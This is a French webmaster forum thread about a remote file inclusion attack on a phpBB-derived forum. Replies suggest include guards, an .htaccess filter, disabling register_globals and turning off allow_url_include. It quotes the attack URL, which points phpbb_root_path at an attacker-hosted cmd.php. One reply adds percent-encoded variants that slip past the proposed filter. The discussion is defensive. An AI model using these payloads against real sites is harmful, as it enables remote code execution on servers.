[RESOLU] Faille de sécurité PHPBB
11 messages
• Page 1 sur 1
Consultez la formation à Google Analytics de WebRankInfo / Ranking Metrics
-

EasyExpat - WRInaute impliqué

- Messages: 500
- Inscription: 8 Oct 2002
[RESOLU] Faille de sécurité PHPBB
Salut
Bon, j'ai été attacké cette nuit donc je fais partager et les solutions de sécurité sont les bienvenues. Voila ce qui s'est passé (c'est déja documenté sur le net):
Documenté ici :
http://www.frsirt.com/english/advisories/2007/0451
ou ici:
http://secwatch.org/advisories/1015365/
Donc j'ai tourné url_fopen off dans php afin que cette vulnérabilité ne puisse etre utilisée. Ceci dit, ca me gene sur d'autres aspecs du site, donc toute solution de sécurisation serait la bienvenue...Par exemple checker la valeur retour et interdire si elle commence par http ?? Dans quels fichier ?
Merci d'avance des suggestions et correctifs...
Bon, j'ai été attacké cette nuit donc je fais partager et les solutions de sécurité sont les bienvenues. Voila ce qui s'est passé (c'est déja documenté sur le net):
- Code: Tout sélectionner
Arbitrary File Inclusion:
http://[target]/includes/functions.php?phpbb_root_path=http://[attacker]/cmd.php
Documenté ici :
http://www.frsirt.com/english/advisories/2007/0451
ou ici:
http://secwatch.org/advisories/1015365/
Donc j'ai tourné url_fopen off dans php afin que cette vulnérabilité ne puisse etre utilisée. Ceci dit, ca me gene sur d'autres aspecs du site, donc toute solution de sécurisation serait la bienvenue...Par exemple checker la valeur retour et interdire si elle commence par http ?? Dans quels fichier ?
Merci d'avance des suggestions et correctifs...
Dernière édition par EasyExpat le Ven Juin 20, 2008 13:59, édité 1 fois.
- darkjukka
- WRInaute impliqué

- Messages: 669
- Inscription: 28 Avr 2007
- Code: Tout sélectionner
if ( !defined('IN_PHPBB') && !defined('IN_PORTAL') ) {
die('Hacking attempt');
exit;
}
Au début des fichiers de ce genre évite les inclusions comme cela
-

EasyExpat - WRInaute impliqué

- Messages: 500
- Inscription: 8 Oct 2002
loran750 a écrit:Euh ...
1/ ça date de 2007
2/ ça ne concerne pas PhpBB mais un clode nommé PhpBB XS (renommé depuis en Icy Phoenix).
Donc rien à voir avec PhpBB !
Il se trouve seulement que la faille est a plusieurs niveaux. Tu veux que j'essaye sur ton forum
darkjukka> Mais il y a cette protection dans le code PHPBB au niveau du fichier common.php deja:
- Code: Tout sélectionner
if ( !defined('IN_PHPBB') )
{
die("Hacking attempt");
}
-

webmasterlamogere - WRInaute passionné

- Messages: 1874
- Inscription: 17 Déc 2006
il y a la solution htaccess pour bloquer : http://www.urlrewriting.fr/scripts58-Snipets.html
c'est à cause de register_globals à on
c'est à cause de register_globals à on
-

EasyExpat - WRInaute impliqué

- Messages: 500
- Inscription: 8 Oct 2002
webmasterlamogere a écrit:c'est à cause de register_globals à on
Je sais
webmasterlamogere a écrit:il y a la solution htaccess pour bloquer : http://www.urlrewriting.fr/scripts58-Snipets.html
Bon c'est super ca !! Merci
- Capitaine
- Nouveau WRInaute

- Messages: 42
- Inscription: 3 Jan 2005
EasyExpat a écrit:webmasterlamogere a écrit:il y a la solution htaccess pour bloquer : http://www.urlrewriting.fr/scripts58-Snipets.html
Bon c'est super ca !! Merci
2 remarques :
- il manque "RewriteEngine On" juste au début (pas évident pour qqun qui débute)
- cette protection est inefficace :
http://[target]/?phpbb_root_path=%68ttp://[attacker]
ou
http://[target]/?phpbb_root_path=htt%70://[attacker]
passe quand meme
-

Bool - WRInaute passionné

- Messages: 1290
- Inscription: 26 Fév 2004
Au lieu de désactiver l'URL fopen qui en lui même ne pose pas vraiment de problème, il est préférable de désactiver l'URL include qui lui ne rime à rien.
Par contre cette option n'est disponible que depuis PHP 5.2.
PS : mais ça n'empêche pas de désactiver le register_globals et de corriger les failles...
- Code: Tout sélectionner
; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
allow_url_include = Off
Par contre cette option n'est disponible que depuis PHP 5.2.
PS : mais ça n'empêche pas de désactiver le register_globals et de corriger les failles...
-

EasyExpat - WRInaute impliqué

- Messages: 500
- Inscription: 8 Oct 2002
Bool a écrit:Au lieu de désactiver l'URL fopen qui en lui même ne pose pas vraiment de problème, il est préférable de désactiver l'URL include qui lui ne rime à rien.
Par contre cette option n'est disponible que depuis PHP 5.2.
PS : mais ça n'empêche pas de désactiver le register_globals et de corriger les failles...
Merci
En ce qui concerne la remarque sur le register_globals, je sais, c'est dans la TODO list :-p
11 messages
• Page 1 sur 1
Formation recommandée sur ce thème :
Formation Google Analytics : en 2 jours, apprenez comment exploiter l'essentiel des possibilités de l'outil de mesure d'audience de Google. Formation animée par les experts Google Analytics de Ranking Metrics.
Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.
Lectures recommandées sur ce thème :
- Faille de sécurité PHP
- Faille de securité Adword!!!!!!!
- Faille de sécurité sur Adsense ???
- Faille de securite chez Google
- Faille securite sur spip
- [php] Faille de sécurité include()
- Faille de sécurité IE6 XP SP1
- Faille de sécurité dans SPIP v<1.7
- Faille de sécurité dans Plesk et ProFTPd
- Attention faille de sécurité avec Phpmyvisits
Qui est en ligne
Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 0 invités


